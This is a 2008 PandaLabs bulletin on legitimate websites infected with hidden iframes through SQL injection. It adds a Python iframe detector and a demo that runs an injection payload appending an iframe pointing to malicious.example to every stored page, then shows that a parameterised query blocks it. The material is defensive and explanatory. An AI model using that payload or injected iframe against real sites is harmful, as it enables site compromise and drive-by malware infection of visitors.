PandaLabs - Everything you need to know about Internet threats - www.pandalabs.com


PandaLabs Bulletins: Legitimate Webs in jeopardy

© Panda Security 2008 | PandaLabs www.pandasecurity.com/homeusers/security_info | www.pandalabs.com


Index

1.- Introduction
2.- Modus operandi
3.- The most notable case
4.- Trends
5.- How to ensure you are protected?



1.- Introduction

Although awareness of Internet threats has grown, many users still believe that staying away from dubious Web pages is enough to avoid malware infection. Malware on the Internet is usually associated with malicious or suspicious Web pages, not with legitimate ones. However, since no system is 100% secure, cyber-crooks take advantage of the trust users place in specific domains to drop malicious code on their systems. This technique is mainly used to spread malware, but it could equally be employed to distribute spam or to store stolen data. This article provides an insight into these types of attacks, specific cases and possible future trends. It also includes several tips to prevent you from falling victim to them.

2.- Modus operandi

Legitimate Web page infection consists of modifying the Web page source code by adding an iframe-type reference pointing to a malicious server. Cyber-crooks can gain the access needed to do this in several ways:

1. By exploiting vulnerabilities in the software installed on the server.
2. Through misconfiguration of the programs installed and running on it.
3. By stealing the passwords used to access the server, typically with Trojans.

At least one of these conditions must be met before the Web page source code can be modified. Once they have this access, cyber-crooks can do more than infect the corporate website: they can use the servers for a range of malicious actions, including hosting a program designed to infect visitors, distributing spam or storing stolen data.

Once they have access to the Web page, cyber-crooks add an iframe-type reference at the end of the file the server loads by default, pointing to the malicious server. Users do not suspect a thing, since the modification is made to the HTML code of the legitimate page and nothing visible changes. When users visit a page to which a malicious iframe has been added, the iframe establishes a connection, transparent to the user, with a page that checks the visiting computer for specific vulnerabilities. If the computer has been patched against those vulnerabilities, the user is not infected. If it has not, the malware, normally a password stealer, is downloaded and run automatically.

The choice of a password stealer is no coincidence: it is the type of malware that turns a successful infection into the largest financial gain for the cyber-crooks. This malware captures all kinds of confidential information (passwords, user names, email addresses) which the attackers can then use for subsequent fraud.



As for the exploits used to infect users, they initially tended to target the operating system. Users who had applied the corresponding operating system patches were not infected, except through zero-day exploits for which no patch had yet been released. Consequently, attackers widened their scope to browsers such as Internet Explorer and Firefox, and to popular applications: Windows Media Player, QuickTime, Acrobat, Flash Player, etc. The diagram below illustrates these types of attacks:

Example of an iframe-type attack

The process is as follows:

1. Several legitimate Web pages have been modified through the insertion of a malicious iframe, http://www..com/1.js in the example.
2. When users visit an infected legitimate Web page, the iframe connects to a Web page on the attacker's server, in this case http://www..com/1.htm. This connection is imperceptible to users.
3. This Web page holds a list of vulnerabilities that it tries to exploit on the visiting system.
4. Once a vulnerability is found, the malware is downloaded.
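As an added example, not code from the PandaLabs bulletin, the following Python script shows how an administrator could check pages for the kind of injected iframe described in the modus operandi above: it parses each page, collects every iframe and flags those that point at a host other than the site's own, are hidden (zero or one pixel in size, or display:none), or sit after the closing </html> tag, which is where an appended reference lands. The two sample pages, the legitimate host www.example-corp.com and the attacker host malicious.example are constructed for the demonstration.

```python
"""Flag injected iframes in HTML pages (added example, not PandaLabs code).

Assumed: the site being checked is www.example-corp.com and the attacker
host is malicious.example; both sample pages are constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

LEGIT_HOST = "www.example-corp.com"  # assumption: the site's own host name

# Constructed sample pages: the clean original and the same page after an
# attacker has appended a hidden iframe behind the closing </html> tag.
CLEAN_PAGE = (
    '<html><body><h1>Welcome</h1>'
    '<iframe src="/news.html" width="600" height="400"></iframe>'
    '</body></html>'
)
INFECTED_PAGE = CLEAN_PAGE + (
    '\n<iframe src="http://malicious.example/1.htm" width="0" height="0"></iframe>'
)


class IframeCollector(HTMLParser):
    """Collect every <iframe> with its attributes and whether it follows </html>."""

    def __init__(self):
        super().__init__()
        self.frames = []
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({"attrs": dict(attrs), "after_html": self.html_closed})

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True


def is_hidden(attrs):
    """Zero- or one-pixel frames and display:none are the usual injection signature."""
    width = (attrs.get("width") or "").strip().rstrip("px")
    height = (attrs.get("height") or "").strip().rstrip("px")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (width in ("0", "1") or height in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def find_injected_iframes(html_text, legit_host=LEGIT_HOST):
    """Return [(src, [reasons...])] for every iframe that looks injected."""
    parser = IframeCollector()
    parser.feed(html_text)
    parser.close()
    findings = []
    for frame in parser.frames:
        attrs = frame["attrs"]
        src = attrs.get("src") or ""
        # A relative src stays on the site's own host; anything else is external.
        host = urlparse(src).hostname or legit_host
        reasons = []
        if host != legit_host:
            reasons.append("points to external host %s" % host)
        if is_hidden(attrs):
            reasons.append("hidden (zero-size or display:none)")
        if frame["after_html"]:
            reasons.append("appended after </html>")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, find_injected_iframes(page))
```

Run over a site's document root, a hit on any of the three signals is worth a look; a hit on all three, as in the constructed infected page, is the pattern this bulletin describes. The check does not replace comparing the served files against a known-good copy, but it needs no baseline to be useful.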

3.- The most notable case

One of the most notable trends this year has been the SQL Injection attacks affecting hundreds of thousands of servers. Where a site builds its database queries from unvalidated user input, this type of attack lets the attacker alter the stored page content and so insert the iframe. Numerous compromised servers were detected at the beginning of April. Their pages were modified to include an iframe that pointed to a server which exploited several vulnerabilities, such as:

- MS06-014: Vulnerability in the Microsoft Data Access Components (MDAC) Function
- MS07-004: Vulnerability in Vector Markup Language
- MS07-018: Vulnerabilities in Microsoft Content Management Server
- MS07-033: Cumulative Security Update for Internet Explorer
- MS07-055: Vulnerability in Kodak Image Viewer

These vulnerabilities were exploited to distribute different types of malware. The SQL Injection attacks were highly organized. Given the large number of affected servers, the attack must have been automated, using a tool developed specifically to scan servers and test each one for SQL Injection. One of the most successful of these attacks was detected at the beginning of April and affected half a million Web pages. A programming flaw in certain ASP pages, the SQL Injection weakness itself, allowed the malicious iframe to be inserted on hundreds of thousands of pages.

4.- Trends

When these cases came to light, users panicked, since millions of legitimate and trusted pages were infected. Despite the seriousness of the situation, the number of affected pages has since decreased significantly, because their administrators took the necessary measures to resolve the problem and prevent their servers' pages from being infected again. The number of infected pages is expected to keep decreasing, since Web administrators are now better informed. However, if a zero-day exploit appears, cyber-crooks could revive these attacks during the window before the corresponding patch is published.

On the other hand, before these attacks appeared, several kits for installing malware through exploits had already been developed, e.g. Mpack. These tools are designed to exploit vulnerabilities in order to distribute malware. In that case the pages are built by the cyber-crooks themselves, who usually give them names similar to legitimate ones in order to fool users.

5.- How to ensure you are protected?

From a user's point of view, to avoid infection systems must be kept up-to-date against known vulnerabilities, and complemented with an antivirus with up-to-date proactive technologies. From an administrator's point of view, servers must be kept up-to-date so that known vulnerabilities are not left open; administrators must make sure that the pages which access their database are correctly programmed, with every user-supplied value passed to the database as a bound parameter rather than pasted into the query text; and server passwords must be changed frequently, so that anyone who has obtained them cannot go on using them.
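To make the administrator's side of this advice concrete, here is an added example, not PandaLabs code, in Python with SQLite. It models an article page that reads one row by its "id" request parameter: first the string-built query behind a mass SQL Injection of the kind described in section 3, then the parameterised version the advice above calls for, with the same payload sent to both. The table, its three rows, the host malicious.example and the iframe text are constructed for the demonstration. Running the vulnerable query through executescript so that stacked statements execute is an assumption about the modelled application; a single request that tags every stored page depends on stacked statements being allowed.

```python
"""String-built vs parameterised SQL (added example, not PandaLabs code).

Assumed: an article page that reads one row by its "id" request parameter.
The table, its rows, the host malicious.example and the iframe text are
constructed for the demonstration.
"""
import sqlite3

INJECTED_IFRAME = (
    '<iframe src="http://malicious.example/1.htm" width="0" height="0"></iframe>'
)

# What an attacker sends in the "id" parameter: finish the intended statement,
# append an UPDATE that tags every stored page, comment out whatever follows.
PAYLOAD = "1; UPDATE articles SET body = body || '%s'; --" % INJECTED_IFRAME


def fresh_db():
    """In-memory database with three constructed pages, all published."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT,
                               body TEXT, published INTEGER);
        INSERT INTO articles VALUES (1, 'Home',    '<p>Welcome</p>',  1);
        INSERT INTO articles VALUES (2, 'About',   '<p>About us</p>', 1);
        INSERT INTO articles VALUES (3, 'Contact', '<p>Call us</p>',  1);
    """)
    return con


def vulnerable_lookup(con, article_id):
    """The flawed page: the request parameter is pasted into the SQL text.

    executescript is used so that stacked statements run; that the real
    application allowed this is an assumption of the example.
    """
    sql = ("SELECT title, body FROM articles WHERE id = %s AND published = 1"
           % article_id)
    con.executescript(sql)
    con.commit()


def safe_lookup(con, article_id):
    """The fixed page: the parameter is bound as a value, never parsed as SQL."""
    cur = con.execute(
        "SELECT title, body FROM articles WHERE id = ? AND published = 1",
        (article_id,),
    )
    return cur.fetchall()


def tainted_page_count(con):
    """How many stored pages now carry an iframe."""
    cur = con.execute("SELECT COUNT(*) FROM articles WHERE body LIKE '%<iframe%'")
    return cur.fetchone()[0]


def run_vulnerable():
    con = fresh_db()
    vulnerable_lookup(con, PAYLOAD)
    return tainted_page_count(con)        # 3: one request tagged every page


def run_safe():
    con = fresh_db()
    rows = safe_lookup(con, PAYLOAD)
    return tainted_page_count(con), rows  # (0, []): the payload matches nothing


if __name__ == "__main__":
    print("pages tainted via string-built query:", run_vulnerable())
    print("pages tainted via bound parameter:", run_safe())
```

The point of the side-by-side is that the fix is not filtering the input: the bound parameter is compared with the id column as a value, the payload matches no row, and nothing in it is ever parsed as SQL. The same change, applied to every page that touches the database, is what closes the hole the April attacks used.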

